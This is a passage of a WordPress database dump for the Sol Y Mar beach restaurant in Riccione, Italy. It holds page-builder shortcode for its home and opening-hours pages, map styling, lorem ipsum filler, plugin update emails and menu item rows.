parallax_background_elements_vertical_alignment=\"bottom\" enable_parallax_effect=\"no\" left_parallax_background_element=\"776\"][vc_column_inner][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"three-columns\" switch_to_one_column=\"1024\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"50px 0 0 0\" item_padding_1367_1600=\"50px 0 0 0\" item_padding_1025_1366=\"0px 0 0 0\" item_padding_769_1024=\"0px 20% 0 20%\" item_padding_681_768=\"39px 17% 0 17%\" item_padding_680=\"15px 8% 0 8%\" custom_class=\"mkdf-reveal-from-left\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"1198\" image_size=\"full\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row content_text_aligment=\"center\" el_class=\"main-home-second-row\"][vc_column width=\"1/3\" css=\".vc_custom_1533736057368{margin-top: -375px !important;}\"][vc_zigzag][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1533739073010{margin-top: -60px !important;}\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 0 0 0\" item_padding_680=\"287px 0 0 0\"][mkdf_menu_popup opener_skin=\"mkdf-menu-popup-light-opener\" number_of_columns=\"one\" column_one_category=\"maindish\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column width=\"1/3\"][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1536047365110{margin-top: -160px !important;}\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"center\" item_padding=\"0 13% 0\" item_padding_1367_1600=\"0 9% 0\" item_padding_1025_1366=\"0 7% 0\" item_padding_769_1024=\"0 10% 0\"][vc_row_inner css=\".vc_custom_1537347303080{padding-top: 225px !important;padding-right: 12% !important;padding-bottom: 140px !important;padding-left: 12% !important;background-color: rgba(237,223,211,0.4) !important;*background-color: rgb(237,223,211) !important;}\" el_class=\"mkdf-reveal-from-left\"][vc_column_inner][vc_column_text]\r\n<p style=\"text-align: center;\">Piatti di pesce tra tende e arredi bianchi in un elegante ristorante dallo stile provenzale sulla spiaggia</p>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1534503338704{padding-top: 150px !important;}\"][vc_column][mkdf_portfolio_list type=\"trio\" space_between_items=\"normal\" enable_image_shadow=\"no\" orderby=\"date\" order=\"ASC\" item_style=\"trio-info-bottom-hover\" title_tag=\"h6\" category=\"food\"][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1533811367372{margin-top: -306px !important;}\"][vc_row_inner enable_parallax_background_elements=\"yes\" parallax_background_elements_vertical_alignment=\"middle\" enable_parallax_effect=\"no\" left_parallax_background_element=\"149\" css=\".vc_custom_1537280502379{padding-top: 13% !important;padding-bottom: 13% !important;}\"][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column css=\".vc_custom_1533809912373{margin-top: -86px !important;}\" offset=\"vc_col-lg-6 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"right\" item_padding=\"0 0 0 0\" item_padding_769_1024=\"0 15% 0 15%\" item_padding_681_768=\"0 12% 0 12%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" image=\"1199\" image_size=\"full\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column css=\".vc_custom_1533811471107{margin-top: -336px !important;}\" offset=\"vc_col-lg-6 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"6px 21% 0 2%\" item_padding_1367_1600=\"66px 0% 0 27%\" item_padding_1025_1366=\"120px 0% 300px 20%\" item_padding_769_1024=\"54% 41% 28% 2%\" item_padding_681_768=\"73% 26% 35% 0%\" item_padding_680=\"131% 0% 95% 0%\"][mkdf_section_title type=\"standard\" position=\"\" text_tag=\"\" text_font_weight=\"\" line_margin=\"49px 60px\" line_length=\"114px\" text=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Cras at neque sit amet ligula mattis mollis. Proin sed tempor elit. Proin at nisi tellus. Aenean iaculis, quam vel semper mollis, justo ipsum tempus erat, vel imperdiet diam magna vitae quam. Sed fermentum mollis felis sit amet ultricies. Fusce et erat massa. Sed sed varius purus. Maecenas dictum orci vulputate mattis tincidunt.\r\n\r\nMauris pretium lectus ante, vel aliquet nibh consectetur sed. Nam vel ligula vel turpis malesuada fermentum ut vitae quam. Praesent convallis metus nec mauris bibendum dapibus. Proin maximus ornare feugiat. Nulla a magna nec augue tincidunt condimentum. Donec elementum facilisis diam, et varius ante pellentesque et. Phasellus ac purus vulputate, accumsan mi a, convallis elit. Suspendisse potenti. Proin tempus justo eget tortor vehicula faucibus. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus.\" text_margin=\"40px\"][/mkdf_section_title][vc_empty_space height=\"55px\"][mkdf_button type=\"simple\" text=\"scopri il menu\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"#\" margin=\"0 0 0 59%\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column css=\".vc_custom_1534769660562{margin-top: -190px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0px 5% 0 23%\" item_padding_1367_1600=\"60px 5% 0 17%\" item_padding_1025_1366=\"125px 0% 0 19%\" item_padding_769_1024=\"0px 5% 0 4%\" item_padding_681_768=\"0px 36% 0 0%\" item_padding_680=\"0px 0% 0 0%\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h2\" disable_break_words=\"no\" title=\"Cucina di pesce\" title_break_words=\"4\" line_length=\"0px\" text_margin=\"30px\"][/mkdf_section_title][/mkdf_elements_holder_item][/mkdf_elements_holder][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"right\" item_padding=\"29px 0 0 21%\" item_padding_681_768=\"29px 33% 0 0%\" item_padding_680=\"35px 0 90% 0%\"][mkdf_button type=\"simple\" text=\"see more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"http://attika.mikado-themes.com/fine-dinning-concept/\" margin=\"30px 10% 0 0%\"][vc_empty_space height=\"124px\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" enable_parallax=\"yes\" parallax_offset=\"30\" parallax_smoothness=\"40\" image=\"1177\" image_size=\"full\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column css=\".vc_custom_1534769683015{margin-top: -374px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"202px 0% 0px 27%\" item_padding_681_768=\"85% 20% 0% 0%\" item_padding_1025_1366=\"219px 0% 0px 25%\" item_padding_769_1024=\"185px 0% 0px 7%\" item_padding_680=\"202px 0% 0px 0%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" enable_parallax=\"yes\" parallax_smoothness=\"40\" image=\"1178\" image_size=\"full\"][vc_empty_space height=\"100px\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h2\" disable_break_words=\"no\" title=\"Alta qualità\" title_break_words=\"4\" line_length=\"0px\" text_margin=\"30px\"]Dal 1994 in continua evoluzione, con Passione ,Coerenza ,Materia Prima e Tecnica , Teo e Thomas in cucina , Barbara e Mattia in sala, una famiglia al servizio del gusto e del buon cibo sulla spiaggia di Riccione[/mkdf_section_title][vc_empty_space height=\"30px\"][mkdf_button type=\"simple\" text=\"see more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"http://attika.mikado-themes.com/fine-dinning-concept/\" margin=\"30px 0% 0 56%\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row css=\".vc_custom_1536913540691{padding-top: 130px !important;}\"][vc_column][mkdf_checker_box_circle_info icon_pack=\"linea_icons\" linea_icon=\"icon-basic-clock\" button_target=\"_self\" button_text=\"Prenota\" left_content=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Duis congue condimentum ligula, fringilla egestas dolor lobortis vel. Praesent eget.\" left_content_background_color=\"#f8f2ed\" right_content=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Duis congue condimentum.\" right_content_background_color=\"#fef8f7\" title_top=\"Pranzo\" text_top=\"Dal martedì alla domenica h. 12.00 / 14.30\" button_link=\"https://www.ristorantesolymar.it/opening-hours/\" left_content_padding=\"123px 26% 118px 14%\" right_content_padding=\"123px 18% 118px 25%\"][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1534769891217{margin-left: -50px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 0 35px 33%\" item_padding_1367_1600=\"0 0 35px 36%\" item_padding_1025_1366=\"0 0 35px 36%\" item_padding_769_1024=\"64px 0 87px 40%\" item_padding_681_768=\"63px 0 0px 18%\" item_padding_680=\"43px 0% 117px 22%\"][vc_column_text]\r\n<h3>Ristorante Sol Y Mar</h3>\r\n[/vc_column_text][vc_empty_space height=\"10px\"][vc_column_text]Via Lungomare D\'Annunzio\r\nRiccione[/vc_column_text][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column css=\".vc_custom_1534769906135{margin-top: -62px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"12px 0 0 33%\" item_padding_769_1024=\"162px 0 0 15%\" item_padding_681_768=\"20% 0% 99px 49%\" item_padding_680=\"12px 12% 79px 12%\" item_padding_1025_1366=\"12px 0 0 30%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" enable_parallax=\"yes\" parallax_offset=\"20\" parallax_smoothness=\"30\" image=\"250\" image_size=\"full\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row css=\".vc_custom_1533133301464{margin-right: 13% !important;margin-left: 13% !important;}\"][vc_column][mkdf_google_map snazzy_map_style=\"yes\" address1=\"via Lungomare D\'Annunzio 190\" pin=\"257\" map_height=\"345px\" snazzy_map_code=\"`{`\r\n{\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#f5f5f5``\r\n}\r\n`}`\r\n},\r\n{\r\n``elementType``: ``labels.icon``,\r\n``stylers``: `{`\r\n{\r\n``visibility``: ``off``\r\n}\r\n`}`\r\n},\r\n{\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#616161``\r\n}\r\n`}`\r\n},\r\n{\r\n``elementType``: ``labels.text.stroke``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#f5f5f5``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``administrative.land_parcel``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#bdbdbd``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``poi``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#eeeeee``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``poi``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#757575``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``poi.park``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#e5e5e5``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``poi.park``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#9e9e9e``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#ffffff``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road.arterial``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#757575``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road.highway``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#dadada``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road.highway``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#616161``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road.local``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#9e9e9e``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``transit.line``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#e5e5e5``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``transit.station``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#eeeeee``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``water``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#c9c9c9``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``water``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#9e9e9e``\r\n}\r\n`}`\r\n}\r\n`}`\" zoom=\"18\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1533133353763{padding-top: 100px !important;}\"][vc_column][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"269\" image_size=\"full\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1537264652300{margin-top: -65px !important;margin-right: 0px !important;margin-left: 0px !important;}\" el_class=\"mkdf-reveal-from-right\"][vc_column width=\"1/5\" offset=\"vc_hidden-md vc_hidden-sm vc_hidden-xs\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1536064601390{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-1/5 vc_col-md-3 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#fef8f7\" title=\"Richieste\" content_padding=\"124px 0\" email=\"info@ristorantesolymar.it\" link=\"mailto:info@ristorantesolymar.it\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"324\" image_size=\"full\"][/vc_column][/vc_row]','Main Home','','inherit','closed','closed','','3040-revision-v1','','','2021-01-20 18:46:14','2021-01-20 17:46:14','',3040,'https://www.ristorantesolymar.it/2021/01/20/3040-revision-v1/',0,'revision','',0),(3982,0,'2021-01-22 01:29:24','2021-01-22 00:29:24','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Smash Balloon Instagram Feed (from version 2.6.2 to 2.7)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar] Some plugins were automatically updated','','private','closed','closed','','sol-y-mar-some-plugins-were-automatically-updated-36','','','2021-01-22 01:29:24','2021-01-22 00:29:24','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-some-plugins-were-automatically-updated-36/',0,'postman_sent_mail','',0),(3983,0,'2021-01-22 01:29:24','2021-01-22 00:29:24','{{unknown}}','','','publish','closed','closed','','aacde4a6ad91bb7728f6b945969471c7','','','2021-01-22 01:29:24','2021-01-22 00:29:24','',0,'https://www.ristorantesolymar.it/2021/01/22/aacde4a6ad91bb7728f6b945969471c7/',0,'oembed_cache','',0),(3985,1,'2021-01-22 09:35:39','2021-01-22 08:35:39',' ','','','publish','closed','closed','','3985','','','2021-01-22 09:47:22','2021-01-22 08:47:22','',0,'https://www.ristorantesolymar.it/?p=3985',4,'nav_menu_item','',0),(3987,0,'2021-01-22 13:24:18','2021-01-22 12:24:18','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Newsletter, SMTP, Email marketing and Subscribe forms by Sendinblue (from version 3.1.2 to 3.1.3)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar] Some plugins were automatically updated','','private','closed','closed','','sol-y-mar-some-plugins-were-automatically-updated-37','','','2021-01-22 13:24:18','2021-01-22 12:24:18','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-some-plugins-were-automatically-updated-37/',0,'postman_sent_mail','',0),(3988,1,'2021-01-23 18:26:01','2021-01-23 17:26:01','[vc_row content_placement=\"middle\" row_content_width=\"grid\" content_text_aligment=\"right\" css=\".vc_custom_1535635181617{padding-top: 130px !important;}\"][vc_column width=\"2/3\" offset=\"vc_col-lg-4 vc_col-md-8 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 0 0 0\" item_padding_1367_1600=\"0 0 0% 0\" item_padding_1025_1366=\"0 0 0% 0\" item_padding_769_1024=\"0 0 11% 0\" item_padding_681_768=\"0 0 13% 0\" item_padding_680=\"0 0 20% 0\"][mkdf_section_title type=\"standard\" position=\"left\" title_tag=\"\" disable_break_words=\"no\" text_tag=\"\" text_font_weight=\"\" line_length=\"120px\" title=\"Siamo aperti\" title_break_words=\"1\" text=\"Attica Fine Dining Restaurant\r\nRainbow Ridge Dr street 35\r\nNY City, NY\" text_margin=\"45px\" line_margin=\"50px 14% 0 20%\"]Dal martedì alla domenica\r\n12.00 - 14.30[/mkdf_section_title][vc_empty_space height=\"62px\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column width=\"1/3\" offset=\"vc_col-lg-1 vc_col-md-4 vc_hidden-xs\"][/vc_column][vc_column offset=\"vc_col-lg-4 vc_col-md-12 vc_col-xs-12\"][vc_column_text]\r\n<p style=\"text-align: left;\">Puoi prenotare il tuo evento speciale</p>\r\n<a href=\"https://www.ristorantesolymar.it/acquista-cena/\">Vai</a>[/vc_column_text][vc_empty_space height=\"55px\"][/vc_column][vc_column offset=\"vc_col-lg-3 vc_col-md-12 vc_col-xs-12\"][vc_column_text]\r\n<p style=\"text-align: left;\">Idea regalo? Acquista un coupon, regala un\'esperienza</p>\r\n<a href=\"https://www.ristorantesolymar.it/regala-cena/\">Vai</a>[/vc_column_text][vc_empty_space height=\"85px\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column width=\"2/3\" offset=\"vc_col-lg-4 vc_col-md-8 vc_hidden-xs\"][/vc_column][vc_column width=\"1/3\" offset=\"vc_col-lg-4 vc_hidden-md vc_hidden-sm vc_hidden-xs\"][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1535116332165{margin-top: -50px !important;margin-bottom: -210px !important;}\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" image=\"2120\" image_size=\"full\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" content_text_aligment=\"center\" css=\".vc_custom_1534504832287{padding-top: 100px !important;padding-bottom: 200px !important;}\"][vc_column offset=\"vc_col-lg-offset-2 vc_col-lg-8\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h5\" disable_break_words=\"no\" line_margin=\"20px 0 -10px 50%\" line_length=\"45px\" title=\"Contattaci\"][/mkdf_section_title][contact-form-7 id=\"203\"][/vc_column][/vc_row]','Orari di apertura','','inherit','closed','closed','','3059-revision-v1','','','2021-01-23 18:26:01','2021-01-23 17:26:01','',3059,'https://www.ristorantesolymar.it/2021/01/23/3059-revision-v1/',0,'revision','',0),(3989,1,'2021-01-23 18:36:09','2021-01-23 17:36:09','','Home','','publish','closed','closed','','home-13','','','2021-01-23 18:36:09','2021-01-23 17:36:09','',0,'https://www.ristorantesolymar.it/2021/01/23/home-13/',1,'nav_menu_item','',0),(3990,1,'2021-01-23 18:36:09','2021-01-23 17:36:09','','Pages','','publish','closed','closed','','pages-13','','','2021-01-23 18:36:09','2021-01-23 17:36:09','',0,'https://www.ristorantesolymar.it/2021/01/23/pages-13/',11,'nav_menu_item','',0),(3991,1,'2021-01-23 18:36:09','2021-01-23 17:36:09','','Blog','','publish','closed','closed','','blog-13','','','2021-01-23 18:36:09','2021-01-23 17:36:09','',0,'https://www.ristorantesolymar.it/2021/01/23/blog-13/',22,'nav_menu_item','',0),(3992,1,'2021-01-23 18:36:09','2021-01-23 17:36:09','','Shop','','publish','closed','closed','','shop-13','','','2021-01-23 18:36:09','2021-01-23 17:36:09','',0,'https://www.ristorantesolymar.it/2021/01/23/shop-13/',33,'nav_menu_item','',0),(3993,1,'2021-01-23 18:36:09','2021-01-23 17:36:09','','Portfolio','','publish','closed','closed','','portfolio-13','','','2021-01-23 18:36:09','2021-01-23 17:36:09','',0,'https://www.ristorantesolymar.it/2021/01/23/portfolio-13/',45,'nav_menu_item','',0),(3994,1,'2021-01-23 18:36:09','2021-01-23 17:36:09','','Elements','','publish','closed','closed','','elements-7','','','2021-01-23 18:36:09','2021-01-23 17:36:09','',0,'https://www.ristorantesolymar.it/2021/01/23/elements-7/',68,'nav_menu_item','',0),(3995,1,'2021-01-23 18:36:09','2021-01-23 17:36:09','','Home','','publish','closed','closed','','home-14','','','2021-01-23 18:36:09','2021-01-23 17:36:09','',0,'https://www.ristorantesolymar.it/2021/01/23/home-14/',1,'nav_menu_item','',0),(3996,1,'2021-01-23 18:36:09','2021-01-23 17:36:09','','Pages','','publish','closed','closed','','pages-14','','','2021-01-23 18:36:09','2021-01-23 17:36:09','',0,'https://www.ristorantesolymar.it/2021/01/23/pages-14/',11,'nav_menu_item','',0),(3997,1,'2021-01-23 18:36:09','2021-01-23 17:36:09','','Portfolio','','publish','closed','closed','','portfolio-14','','','2021-01-23 18:36:09','2021-01-23 17:36:09','',0,'https://www.ristorantesolymar.it/2021/01/23/portfolio-14/',22,'nav_menu_item','',0),(3998,1,'2021-01-23 18:36:09','2021-01-23 17:36:09','','Shop','','publish','closed','closed','','shop-14','','','2021-01-23 18:36:09','2021-01-23 17:36:09','',0,'https://www.ristorantesolymar.it/2021/01/23/shop-14/',1,'nav_menu_item','',0),(3999,1,'2021-01-23 18:36:09','2021-01-23 17:36:09','','Blog','','publish','closed','closed','','blog-14','','','2021-01-23 18:36:09','2021-01-23 17:36:09','',0,'https://www.ristorantesolymar.it/2021/01/23/blog-14/',13,'nav_menu_item','',0),(4000,1,'2021-01-23 18:36:09','2021-01-23 17:36:09','','Elements','','publish','closed','closed','','elements-8','','','2021-01-23 18:36:09','2021-01-23 17:36:09','',0,'https://www.ristorantesolymar.it/2021/01/23/elements-8/',24,'nav_menu_item','',0),(4001,1,'2021-01-23 18:36:09','2021-01-23 17:36:09','','Home','','publish','closed','closed','','home-15','','','2021-01-23 18:36:09','2021-01-23 17:36:09','',0,'https://www.ristorantesolymar.it/2021/01/23/home-15/',1,'nav_menu_item','',0),(4002,1,'2021-01-23 18:36:09','2021-01-23 17:36:09','','Pages','','publish','closed','closed','','pages-15','','','2021-01-23 18:36:09','2021-01-23 17:36:09','',0,'https://www.ristorantesolymar.it/2021/01/23/pages-15/',6,'nav_menu_item','',0),(4003,1,'2021-01-23 18:36:09','2021-01-23 17:36:09','','Shop','','publish','closed','closed','','shop-15','','','2021-01-23 18:36:09','2021-01-23 17:36:09','',0,'https://www.ristorantesolymar.it/2021/01/23/shop-15/',19,'nav_menu_item','',0),(4004,1,'2021-01-23 18:36:09','2021-01-23 17:36:09','','Portfolio','','publish','closed','closed','','portfolio-15','','','2021-01-23 18:36:09','2021-01-23 17:36:09','',0,'https://www.ristorantesolymar.it/2021/01/23/portfolio-15/',11,'nav_menu_item','',0),(4005,1,'2021-01-23 18:36:09','2021-01-23 17:36:09','','Blog','','publish','closed','closed','','blog-15','','','2021-01-23 18:36:09','2021-01-23 17:36:09','',0,'https://www.ristorantesolymar.it/2021/01/23/blog-15/',15,'nav_menu_item','',0),(4006,1,'2021-01-23 18:36:09','2021-01-23 17:36:09','','Home','','publish','closed','closed','','home-16','','','2021-01-23 18:36:09','2021-01-23 17:36:09','',0,'https://www.ristorantesolymar.it/2021/01/23/home-16/',1,'nav_menu_item','',0),(4007,1,'2021-01-23 18:36:09','2021-01-23 17:36:09','','Pages','','publish','closed','closed','','pages-16','','','2021-01-23 18:36:09','2021-01-23 17:36:09','',0,'https://www.ristorantesolymar.it/2021/01/23/pages-16/',6,'nav_menu_item','',0),(4008,1,'2021-01-23 18:36:09','2021-01-23 17:36:09','','Shop','','publish','closed','closed','','shop-16','','','2021-01-23 18:36:09','2021-01-23 17:36:09','',0,'https://www.ristorantesolymar.it/2021/01/23/shop-16/',15,'nav_menu_item','',0),(4009,1,'2021-01-23 18:36:09','2021-01-23 17:36:09','','Blog','','publish','closed','closed','','blog-16','','','2021-01-23 18:36:09','2021-01-23 17:36:09','',0,'https://www.ristorantesolymar.it/2021/01/23/blog-16/',11,'nav_menu_item','',0),(4010,1,'2021-01-23 18:36:09','2021-01-23 17:36:09','','Product Single','','publish','closed','closed','','product-single-13','','','2021-01-23 18:36:09','2021-01-23 17:36:09','',0,'https://www.ristorantesolymar.it/2021/01/23/product-single-13/',35,'nav_menu_item','',0),(4011,1,'2021-01-23 18:36:09','2021-01-23 17:36:09','','Shop Layouts','','publish','closed','closed','','shop-layouts-7','','','2021-01-23 18:36:09','2021-01-23 17:36:09','',0,'https://www.ristorantesolymar.it/2021/01/23/shop-layouts-7/',36,'nav_menu_item','',0),(4012,1,'2021-01-23 18:36:10','2021-01-23 17:36:10','','Shop Pages','','publish','closed','closed','','shop-pages-7','','','2021-01-23 18:36:10','2021-01-23 17:36:10','',0,'https://www.ristorantesolymar.it/2021/01/23/shop-pages-7/',40,'nav_menu_item','',0),(4013,1,'2021-01-23 18:36:10','2021-01-23 17:36:10','','Product Single','','publish','closed','closed','','product-single-14','','','2021-01-23 18:36:10','2021-01-23 17:36:10','',0,'https://www.ristorantesolymar.it/2021/01/23/product-single-14/',3,'nav_menu_item','',0),(4014,1,'2021-01-23 18:36:10','2021-01-23 17:36:10','','Shop Layouts','','publish','closed','closed','','shop-layouts-8','','','2021-01-23 18:36:10','2021-01-23 17:36:10','',0,'https://www.ristorantesolymar.it/2021/01/23/shop-layouts-8/',4,'nav_menu_item','',0),(4015,1,'2021-01-23 18:36:10','2021-01-23 17:36:10','','Shop Pages','','publish','closed','closed','','shop-pages-8','','','2021-01-23 18:36:10','2021-01-23 17:36:10','',0,'https://www.ristorantesolymar.it/2021/01/23/shop-pages-8/',8,'nav_menu_item','',0),(4016,1,'2021-01-23 18:36:10','2021-01-23 17:36:10','','Product Single','','publish','closed','closed','','product-single-15','','','2021-01-23 18:36:10','2021-01-23 17:36:10','',0,'https://www.ristorantesolymar.it/2021/01/23/product-single-15/',21,'nav_menu_item','',0),(4017,1,'2021-01-23 18:36:10','2021-01-23 17:36:10','','Product Single','','publish','closed','closed','','product-single-16','','','2021-01-23 18:36:10','2021-01-23 17:36:10','',0,'https://www.ristorantesolymar.it/2021/01/23/product-single-16/',17,'nav_menu_item','',0),(4018,1,'2021-01-23 18:36:10','2021-01-23 17:36:10','','Classic','','publish','closed','closed','','classic-7','','','2021-01-23 18:36:10','2021-01-23 17:36:10','',0,'https://www.ristorantesolymar.it/2021/01/23/classic-7/',69,'nav_menu_item','',0),(4019,1,'2021-01-23 18:36:10','2021-01-23 17:36:10','','Presentation','','publish','closed','closed','','presentation-7','','','2021-01-23 18:36:10','2021-01-23 17:36:10','',0,'https://www.ristorantesolymar.it/2021/01/23/presentation-7/',78,'nav_menu_item','',0),(4020,1,'2021-01-23 18:36:10','2021-01-23 17:36:10','','Infographic','','publish','closed','closed','','infographic-7','','','2021-01-23 18:36:10','2021-01-23 17:36:10','',0,'https://www.ristorantesolymar.it/2021/01/23/infographic-7/',86,'nav_menu_item','',0),(4021,1,'2021-01-23 18:36:10','2021-01-23 17:36:10','','Typography','','publish','closed','closed','','typography-7','','','2021-01-23 18:36:10','2021-01-23 17:36:10','',0,'https://www.ristorantesolymar.it/2021/01/23/typography-7/',95,'nav_menu_item','',0),(4022,1,'2021-01-23 18:36:10','2021-01-23 17:36:10','','Classic','','publish','closed','closed','','classic-8','','','2021-01-23 18:36:10','2021-01-23 